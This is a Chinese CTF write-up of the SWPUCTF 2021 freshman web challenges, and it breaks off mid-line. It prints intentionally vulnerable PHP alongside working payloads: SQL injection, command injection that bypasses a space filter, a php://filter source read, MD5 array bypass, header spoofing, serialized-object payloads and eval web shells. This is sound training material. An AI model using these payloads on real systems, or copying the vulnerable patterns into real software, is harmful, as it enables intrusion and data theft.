SWPUCTF 2021 新生赛
web
[SWPUCTF 2021 新生赛]gift_F12
右键源代码直接看到flag
WLLMCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}
[SWPUCTF 2021 新生赛]jicao
<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm"){
echo $flag;
}
?>
payload(注意必须是双引号)
GET: ?json={
"x":"wllm"}
POST: id=wllmNB
[SWPUCTF 2021 新生赛]easy_md5
<?php
highlight_file(__FILE__);
include 'flag2.php';
if (isset($_GET['name']) && isset($_POST['password'])){
$name = $_GET['name'];
$password = $_POST['password'];
if ($name != $password && md5($name) == md5($password)){
echo $flag;
}
else {
echo "wrong!";
}
}
else {
echo 'wrong!';
}
?>
md5弱类型,直接上数组比较
GET: ?name[]=1
POST: password[]=2
[SWPUCTF 2021 新生赛]caidao
打开链接http://1.14.71.254:28164/直接显示@eval($_POST['wllm']);
直接上蚁剑连接index.php,在根目录看到flag
[SWPUCTF 2021 新生赛]easyrce
<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url'])){
eval($_GET['url']);
}
?>
没任何过滤,直接上
?url=system("tac /flllllaaaaaaggggggg");
[SWPUCTF 2021 新生赛]easy_sql
?wllm=-1' or 1=1--+ 返回正常
?wllm=-1' or 1=2--+ 返回异常
存在注入直接搞
判断列数
?wllm=-1' order by 3--+ 返回正常
?wllm=-1' order by 4--+ 返回异常
说明存在3列
判断哪列可以回显
?wllm=-1' union select 1,2,3--+
得到
Your Login name:2
Your Password:3
说明2和3列都可以回显
?wllm=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
得到表名:
Your Login name:test_tb,users
Your Password:3
使用test_tb表
?wllm=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="test_tb"--+
得到列名:
Your Login name:id,flag
Your Password:3
最后直接爆字段值
?wllm=-1' union select 1,group_concat(flag),3 from test_tb--+
得到flag
Your Login name:NSSCTF{ec4be791-7211-4518-9238-06362ac19443}
Your Password:3
[SWPUCTF 2021 新生赛]include
<?php
ini_set("allow_url_include","on");
header("Content-type: text/html; charset=utf-8");
error_reporting(0);
$file=$_GET['file'];
if(isset($file)){
show_source(__FILE__);
echo 'flag 在flag.php中';
}else{
echo "传入一个file试试";
}
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
include_once($file);
?>
直接上php伪协议
?file=php://filter/read=convert.base64-encode/resource=flag.php
然后base64解码
//PD9waHANCiRmbGFnPSdOU1NDVEZ7NGVhMWFjZmYtYzA0Mi00OTA2LTgxNzYtYWRmYzI2M2Y5YWM0fSc7
<?php
$flag='NSSCTF{4ea1acff-c042-4906-8176-adfc263f9ac4}';
[SWPUCTF 2021 新生赛]babyrce
<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1)
{
include "../next.php";
}
else
echo "小饼干最好吃啦!";
?>
在header中增加Cookie: admin=1
响应中看到rasalghul.php
,直接访问这个页面
<?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {
$ip=$_GET['url'];
if(preg_match("/ /", $ip)){
die('nonono');
}
$a = shell_exec($ip);
echo $a;
}
?>
shell_exec直接执行Linux命令,但是空格被过滤了,使用${IFS}
绕过
?url=cat${
IFS}/flllllaaaaaaggggggg
[SWPUCTF 2021 新生赛]ez_unserialize
在源代码中发现存在
<!--
User-agent: *
Disallow: 什么东西呢?
-->
访问robots.txt
User-agent: *
Disallow: /cl45s.php
直接打开php看到代码审计
<?php
error_reporting(0);
show_source("cl45s.php");
class wllm{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "ctf"){
include("flag.php");
echo $flag;
}else{
echo $this->admin;
echo $this->passwd;
echo "Just a bit more!";
}
}
}
$p = $_GET['p'];
unserialize($p);
?>
直构造序列化字符串,使其反序列化时触发__destruct
魔术方法
<?php
class wllm{
public $admin = "admin";
public $passwd = "ctf";
}
$a = new wllm();
echo serialize($a); //O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
?>
故最终payload
/cl45s.php?p=O:4:"wllm":2:{
s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
[SWPUCTF 2021 新生赛]Do_you_know_http
直接打开提示Please use 'WLLM' browser!
很明显需要改UA
User-Agent: WLLM
然后302跳转到a.php,又显示You can only read this at local!
很明显改XFF
X-Forwarded-For: 127.0.0.1
然后302跳转到secretttt.php,打开即看到flag
[SWPUCTF 2021 新生赛]easyupload2.0
直接上传一个一句话的phtml文件即可
蚁剑连接,在flag.php中找到flag
[SWPUCTF 2021 新生赛]no_wakeup
<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");
class HaHaHa{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}
public function __wakeup(){
$this->passwd = sha1($this->passwd);
}
public function __destruct(){
if($this->admin === "admin" &&a